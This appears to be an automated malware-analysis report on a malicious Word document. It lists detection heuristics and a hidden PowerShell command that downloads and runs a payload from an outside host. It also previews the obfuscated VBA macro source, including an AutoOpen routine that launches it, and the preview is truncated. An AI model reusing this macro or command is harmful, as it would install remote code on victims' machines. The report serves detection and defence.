MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro attempts to construct and execute a PowerShell command, likely to download and run a second-stage payload. The specific PowerShell command constructed is 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://evil.tld/payload\')"', indicating a downloader functionality.
Heuristics 5
-
ClamAV: Doc.Malware.Valyria-6691553-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6691553-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14461 bytes |
SHA-256: 0284a7a5d0d15e727f15c317892676532744a30ba8016dec3ee888fa555c5b08 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "EAuokdbCuU" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next Hour 8845 Error Month(TtJjZu / PuLwJC + EWMYRq - jRWIDG) Hour 87 Hour Second(57005 + bOzJf) Hour 1391 VBA.Shell% KeyString(Hwkziaat + TtwUQsAVFRbGb + vbKeyC + cnYVnWIBCrNR + vmfbCOpUBr) + GCbhBUf + nCXCQLs + kGwUhr + czLFjs + QZfIuLETav + pHkOs + fjmoHjwQH + pfdqoL + hzrpiZrwXku + tIoMVGXs + EwQhpUnL + HPJzUETJcK + HlhKhQFZVqslWQ + HYlDwaXnjrGt, 517825169 - 517825169 Hour 117 Error VvpTwB End Sub Attribute VB_Name = "AFSYnKpsjA" Function kGwUhr() On Error Resume Next Error 299146586 Hour 8 Hour CDate(fdZZsW) nhcTzlzwF = "m" + "D" + " " + " " + " /" + "v: " + " " Error Str(62576 / PZZqz) Hour 486017147 JoXDFPiS = " " + " " + " " + " " + "/c" Hour 8 Error 860 Error CDbl(FaQmXm - tGiuzp * 32236 - KZHPIH) fCwQuYz = " " + " " + " " + CStr(Chr(CNjCKOvHUbk + DPNAbhYNrtKFvV + 34 + mCcVXOG + YJnmMoBh)) + " " + " " + "Set" + " " Hour mUPrC Hour Sgn(322) Error lkkaH rLfDwKTJiRr = "~" + " " + " " + "=p" + "owe" + "r;" + "he" + "ll6" + "1e" + "6J_" + "BN" Error trhawz Error LCase(63) IwimSjvOwLz = "_" + "HQ" + "_Wg" + "_" + "?_" + "G" + "4_Z" + "Q" + "B3_" + "C0_" + "9wB" + "i_" Hour wnmVIP Error Second(612 - wIjWj + VdHuh - cwdEu) Hour CBool(BXoGmu) DaFPldS = "G" + "o_Z" + "QB" + "j" + "_H" + "Q" + "_" Hour Log(39430 * 29028 / LjEUp + jnZYK) Error Val(jhUbCm) HEKIkZipoBI = "I_" + "BO" + "_" + "GU_" + "d__" + "u_F" + "s" + "_Z" + "QB" + "i" Hour DNLnXH Hour CVar(2) SzwdOU = "_E" + "M" + "_9" + "_" + "Bp_" + "G" + "U" + "_9" + "gB0" + "_" + "D;" + "_J_" + "Bi_" Hour Sqr(8693) Hour CDate(zZaGCq) zGELcE = "EE_" + "dw_" + "?_" + "Cs" + "_a_" + "B0" Error Month(nCVipE - wZzjr) Hour Round(SIrSz / 2056) EifOZmdWh = "_" + "HQ" + "_s_" + "_\" + "_" + "C" + "8_L" + "wBx" + "_H" + "U_Y" + "Q" kGwUhr = nhcTzlzwF + JoXDFPiS + fCwQuYz + rLfDwKTJiRr + IwimSjvOwLz + DaFPldS + HEKIkZipoBI + SzwdOU + zGELcE + EifOZmdWh Error LCase(PXPtd) Error 84 Error Str(3) End Function Function czLFjs() On Error Resume Next Hour CDate(VzSLu) Hour CDate(9063) Hour Month(92) OXsavKBjOC = "Br" + "_G" + "U" + "_" + "sg" + "Bz_" + "GU" + "_s" + "gB" + "2_G" + "]_" Hour Log(WUSkVF * QoczH - 50696 + cvhHw) Hour Sin(flutkM) Hour RURTH dtOhEaLz = "Yw" + "Bl_" + "C" + "4_" + "9g" + "Bl_" + "H" + "Q" + "_L" + "wB" + "L" Hour 7 Hour 9265 Hour Sqr(YXjSwY + OWSjw) EJnBXSfTFpQ = "_" + "E" + "w_" + "sg" + "Bn_" + "E" + "__a" + "_B0" + "_" + "HQ" + "_s" + "__" Error Val(bEzBQO) Error 53 SOkzI = "\_C" + "8_L" + "wB" + "3_" + "Hs" + "_" + "dw_" + "u_H" + "M" + "_9w" Hour Oct(iEXNO) Error Hex(DjYLmV / BFkPDj) diMRKsLT = "Bw_" + "G" + "g" + "_" + "sg" + "Bv_" + "C0_" + "eg" + "Bh" + "_" Hour Log(wlhvDN) Error OjtqLq tVlWAJvXR = "HI_" + "Y" + "Q_" + "u_G" + "M_9" + "wBt" + "_C8" + "_" + "sQ" + "BN" + "_D]" + "_9g" Error 500592860 Hour Second(zLdIN - wTNbc) Error dwdcp LcclLa = "B)_" + "E4" + "_" + "swB" + "5_E" + "__" + "a_B" + "0_H" + "Q_" + "s_" + "_\_" + "C" + "8_" Hour 64 Error Oct(41) Error Cos(4) chjFpF = "Lw" + "Bi" + "_G" + "]_Z" + "w" Error Hex(FbGqOb / CZbSN - wwrDC - qAcuWz) Error HzIwCz Hour Int(63353 - OTnXE) mzswsk = "B" + "0_H" + "Y" + "_" + "ag" + "Bv" Hour 659 Hour Hex(3327) Error Log(AHfhu + nthvch) oNHEYwVAp = "_" + "GI" + "_9" + "_B" + "p" + "_HM" + "_d" + "__u" + "_" + "G" Hour 9 Hour CDate(GnvInM) Error Round(506261560) soocRoERLDn = "M" + "_9w" + "B" + "t_C" + "8_d" + "QB" + "U_" + "GM" + "_aQ" + "B" Hour FdsozY Error 3 Hour CDate(IAqTjA) hUPksE = "r_" + "E" + "__" + "a_" + "B0" + "_H" + "Q_" + "s_" + "_\" + "_C8" + "_L" Hour Log(QzILY / iEsTT) Error Sqr(122) Error CDbl(8188) VAXIkk = "wB" ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.